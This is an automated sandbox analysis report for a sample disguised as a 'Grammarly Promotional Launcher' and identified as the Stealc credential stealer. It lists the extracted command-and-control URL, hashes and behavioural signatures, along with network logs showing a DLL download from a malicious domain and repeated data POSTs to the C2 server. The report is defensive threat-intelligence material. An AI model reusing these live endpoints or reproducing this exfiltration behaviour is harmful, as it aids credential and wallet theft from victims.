Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
96s -
max time network
103s -
platform
windows10-1703_x64 -
resource
win10-20230831-en -
resource tags
arch:x64arch:x86image:win10-20230831-enlocale:en-usos:windows10-1703-x64system -
submitted
02/09/2023, 14:51 UTC
Static task
static1
Behavioral task
behavioral1
Sample
Grammarly Promotional Launcher.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
Grammarly Promotional Launcher.exe
Resource
win10-20230831-en
Behavioral task
behavioral3
Sample
Grammarly Promotional Launcher.exe
Resource
win10v2004-20230831-en
General
-
Target
Grammarly Promotional Launcher.exe
-
Size
20.4MB
-
MD5
9ed667ef1d116c0cb1051b8001b6ea0f
-
SHA1
cbe4fdb8847ff9b5d0aa1e0a43bb3abd28f4a875
-
SHA256
deba2be10d757679996d33d70d37b968088ba37e1d0f86d71beb8be38c34262f
-
SHA512
4fc726f8f2ca7f024f5db1a660a3c9dff109014cc2f56097470b317950d05956c084f2e19fb9da3d14d589444c2bb0a7a370bce8b5dc049b5d3e774994bdd4e1
-
SSDEEP
393216:onRZwqeWLCKhc+0Uz+JD8rY5Pobe7n/k8MoeTtqLiVc4GYbJQp:CN1hxX+QrY5PAe7/kHtsii4bbJG
Malware Config
Extracted
stealc
9323114451583182971321730716
http://89.23.108.122
-
url_path
/e510c4e87f874d68.php
Signatures
-
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
pid Process 4776 MSBuild.exe 4776 MSBuild.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: Grammarly Promotional Launcher.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1544 set thread context of 4776 1544 Grammarly Promotional Launcher.exe 73 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 1544 Grammarly Promotional Launcher.exe 1544 Grammarly Promotional Launcher.exe 1544 Grammarly Promotional Launcher.exe 1544 Grammarly Promotional Launcher.exe 1544 Grammarly Promotional Launcher.exe 1544 Grammarly Promotional Launcher.exe 1544 Grammarly Promotional Launcher.exe 1544 Grammarly Promotional Launcher.exe 1544 Grammarly Promotional Launcher.exe 1544 Grammarly Promotional Launcher.exe 1544 Grammarly Promotional Launcher.exe 1544 Grammarly Promotional Launcher.exe 208 powershell.exe 208 powershell.exe 208 powershell.exe 4776 MSBuild.exe 4776 MSBuild.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 208 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 1544 wrote to memory of 208 1544 Grammarly Promotional Launcher.exe 71 PID 1544 wrote to memory of 208 1544 Grammarly Promotional Launcher.exe 71 PID 1544 wrote to memory of 4776 1544 Grammarly Promotional Launcher.exe 73 PID 1544 wrote to memory of 4776 1544 Grammarly Promotional Launcher.exe 73 PID 1544 wrote to memory of 4776 1544 Grammarly Promotional Launcher.exe 73 PID 1544 wrote to memory of 4776 1544 Grammarly Promotional Launcher.exe 73 PID 1544 wrote to memory of 4776 1544 Grammarly Promotional Launcher.exe 73 PID 1544 wrote to memory of 4776 1544 Grammarly Promotional Launcher.exe 73 PID 1544 wrote to memory of 4776 1544 Grammarly Promotional Launcher.exe 73 PID 1544 wrote to memory of 4776 1544 Grammarly Promotional Launcher.exe 73 PID 1544 wrote to memory of 4776 1544 Grammarly Promotional Launcher.exe 73
Processes
-
C:\Users\Admin\AppData\Local\Temp\Grammarly Promotional Launcher.exe"C:\Users\Admin\AppData\Local\Temp\Grammarly Promotional Launcher.exe"1⤵
- Enumerates connected drives
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:208
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"2⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4776
-
Network
-
Remote address:8.8.8.8:53Requestwww.python.orgIN AResponsewww.python.orgIN CNAMEdualstack.python.map.fastly.netdualstack.python.map.fastly.netIN A151.101.36.223
-
Remote address:151.101.36.223:443RequestGET / HTTP/1.1
accept: */*
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
host: www.python.org
ResponseHTTP/1.1 200 OK
Content-Length: 50753
Server: nginx
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN
Via: 1.1 vegur, 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Date: Sat, 02 Sep 2023 14:51:47 GMT
Age: 3195
X-Served-By: cache-iad-kiad7000025-IAD, cache-ams21076-AMS
X-Cache: HIT, HIT
X-Cache-Hits: 17, 2
X-Timer: S1693666308.811944,VS0,VE0
Vary: Cookie
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
-
Remote address:8.8.8.8:53Request223.36.101.151.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestlazagrc2cnk.xyzIN AResponselazagrc2cnk.xyzIN A89.185.84.37
-
Remote address:89.185.84.37:443RequestGET /rm/ucontent/uid_742954/ep7mdl00.dll HTTP/1.1
accept: */*
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
host: lazagrc2cnk.xyz
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Wed, 30 Aug 2023 09:41:40 GMT
ETag: "1981c-60420bc0a0b34"
Accept-Ranges: bytes
Content-Length: 104476
Content-Type: application/x-msdos-program
-
Remote address:8.8.8.8:53Request37.84.185.89.in-addr.arpaIN PTRResponse37.84.185.89.in-addr.arpaIN PTRfhfggggggggip-ptrtech
-
Remote address:89.23.108.122:80RequestPOST /e510c4e87f874d68.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DHCGHDHIDHCBGCBGCAEB
Host: 89.23.108.122
Content-Length: 210
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 144
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:89.23.108.122:80RequestPOST /e510c4e87f874d68.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJ
Host: 89.23.108.122
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1736
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:89.23.108.122:80RequestPOST /e510c4e87f874d68.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JEHJKJEBGHJJKEBGIECA
Host: 89.23.108.122
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 5056
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:89.23.108.122:80RequestPOST /e510c4e87f874d68.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCF
Host: 89.23.108.122
Content-Length: 4039
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:89.23.108.122:80RequestGET /82d70f9594fbc25a/sqlite3.dll HTTP/1.1
Host: 89.23.108.122
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 12:30:30 GMT
ETag: "10e436-5e7ed3ec64580"
Accept-Ranges: bytes
Content-Length: 1106998
Content-Type: application/x-msdos-program
-
Remote address:89.23.108.122:80RequestGET /82d70f9594fbc25a/freebl3.dll HTTP/1.1
Host: 89.23.108.122
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
ETag: "a7550-5e7ea271b0900"
Accept-Ranges: bytes
Content-Length: 685392
Content-Type: application/x-msdos-program
-
Remote address:89.23.108.122:80RequestGET /82d70f9594fbc25a/mozglue.dll HTTP/1.1
Host: 89.23.108.122
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
ETag: "94750-5e7ea271b0900"
Accept-Ranges: bytes
Content-Length: 608080
Content-Type: application/x-msdos-program
-
Remote address:89.23.108.122:80RequestGET /82d70f9594fbc25a/msvcp140.dll HTTP/1.1
Host: 89.23.108.122
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
ETag: "6dde8-5e7ea271b0900"
Accept-Ranges: bytes
Content-Length: 450024
Content-Type: application/x-msdos-program
-
Remote address:89.23.108.122:80RequestGET /82d70f9594fbc25a/nss3.dll HTTP/1.1
Host: 89.23.108.122
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
ETag: "1f3950-5e7ea271b0900"
Accept-Ranges: bytes
Content-Length: 2046288
Content-Type: application/x-msdos-program
-
Remote address:89.23.108.122:80RequestGET /82d70f9594fbc25a/softokn3.dll HTTP/1.1
Host: 89.23.108.122
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
ETag: "3ef50-5e7ea271b0900"
Accept-Ranges: bytes
Content-Length: 257872
Content-Type: application/x-msdos-program
-
Remote address:89.23.108.122:80RequestGET /82d70f9594fbc25a/vcruntime140.dll HTTP/1.1
Host: 89.23.108.122
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
ETag: "13bf0-5e7ea271b0900"
Accept-Ranges: bytes
Content-Length: 80880
Content-Type: application/x-msdos-program
-
Remote address:89.23.108.122:80RequestPOST /e510c4e87f874d68.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJD
Host: 89.23.108.122
Content-Length: 827
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:89.23.108.122:80RequestPOST /e510c4e87f874d68.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJ
Host: 89.23.108.122
Content-Length: 355
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:89.23.108.122:80RequestPOST /e510c4e87f874d68.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HJKKFIJKFCAKJJJKJKFI
Host: 89.23.108.122
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1596
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:89.23.108.122:80RequestPOST /e510c4e87f874d68.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EHJKKKFIIJJKJKFIECBF
Host: 89.23.108.122
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:89.23.108.122:80RequestPOST /e510c4e87f874d68.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKK
Host: 89.23.108.122
Content-Length: 92347
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:89.23.108.122:80RequestPOST /e510c4e87f874d68.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFI
Host: 89.23.108.122
Content-Length: 264
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Request122.108.23.89.in-addr.arpaIN PTRResponse122.108.23.89.in-addr.arpaIN PTR4S-4-TG-1691929455ip-ptrtech
-
Remote address:8.8.8.8:53Request11.227.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request38.148.119.40.in-addr.arpaIN PTRResponse
-
1.9kB 58.9kB 31 53
HTTP Request
GET https://www.python.org/HTTP Response
200 -
89.185.84.37:443https://lazagrc2cnk.xyz/rm/ucontent/uid_742954/ep7mdl00.dlltls, httpGrammarly Promotional Launcher.exe2.8kB 112.7kB 50 86
HTTP Request
GET https://lazagrc2cnk.xyz/rm/ucontent/uid_742954/ep7mdl00.dllHTTP Response
200 -
284.6kB 5.4MB 3958 3899
HTTP Request
POST http://89.23.108.122/e510c4e87f874d68.phpHTTP Response
200HTTP Request
POST http://89.23.108.122/e510c4e87f874d68.phpHTTP Response
200HTTP Request
POST http://89.23.108.122/e510c4e87f874d68.phpHTTP Response
200HTTP Request
POST http://89.23.108.122/e510c4e87f874d68.phpHTTP Response
200HTTP Request
GET http://89.23.108.122/82d70f9594fbc25a/sqlite3.dllHTTP Response
200HTTP Request
GET http://89.23.108.122/82d70f9594fbc25a/freebl3.dllHTTP Response
200HTTP Request
GET http://89.23.108.122/82d70f9594fbc25a/mozglue.dllHTTP Response
200HTTP Request
GET http://89.23.108.122/82d70f9594fbc25a/msvcp140.dllHTTP Response
200HTTP Request
GET http://89.23.108.122/82d70f9594fbc25a/nss3.dllHTTP Response
200HTTP Request
GET http://89.23.108.122/82d70f9594fbc25a/softokn3.dllHTTP Response
200HTTP Request
GET http://89.23.108.122/82d70f9594fbc25a/vcruntime140.dllHTTP Response
200HTTP Request
POST http://89.23.108.122/e510c4e87f874d68.phpHTTP Response
200HTTP Request
POST http://89.23.108.122/e510c4e87f874d68.phpHTTP Response
200HTTP Request
POST http://89.23.108.122/e510c4e87f874d68.phpHTTP Response
200HTTP Request
POST http://89.23.108.122/e510c4e87f874d68.phpHTTP Response
200HTTP Request
POST http://89.23.108.122/e510c4e87f874d68.phpHTTP Response
200HTTP Request
POST http://89.23.108.122/e510c4e87f874d68.phpHTTP Response
200
-
60 B 121 B 1 1
DNS Request
www.python.org
DNS Response
151.101.36.223
-
73 B 133 B 1 1
DNS Request
223.36.101.151.in-addr.arpa
-
61 B 77 B 1 1
DNS Request
lazagrc2cnk.xyz
DNS Response
89.185.84.37
-
71 B 108 B 1 1
DNS Request
37.84.185.89.in-addr.arpa
-
72 B 116 B 1 1
DNS Request
122.108.23.89.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
11.227.111.52.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
38.148.119.40.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571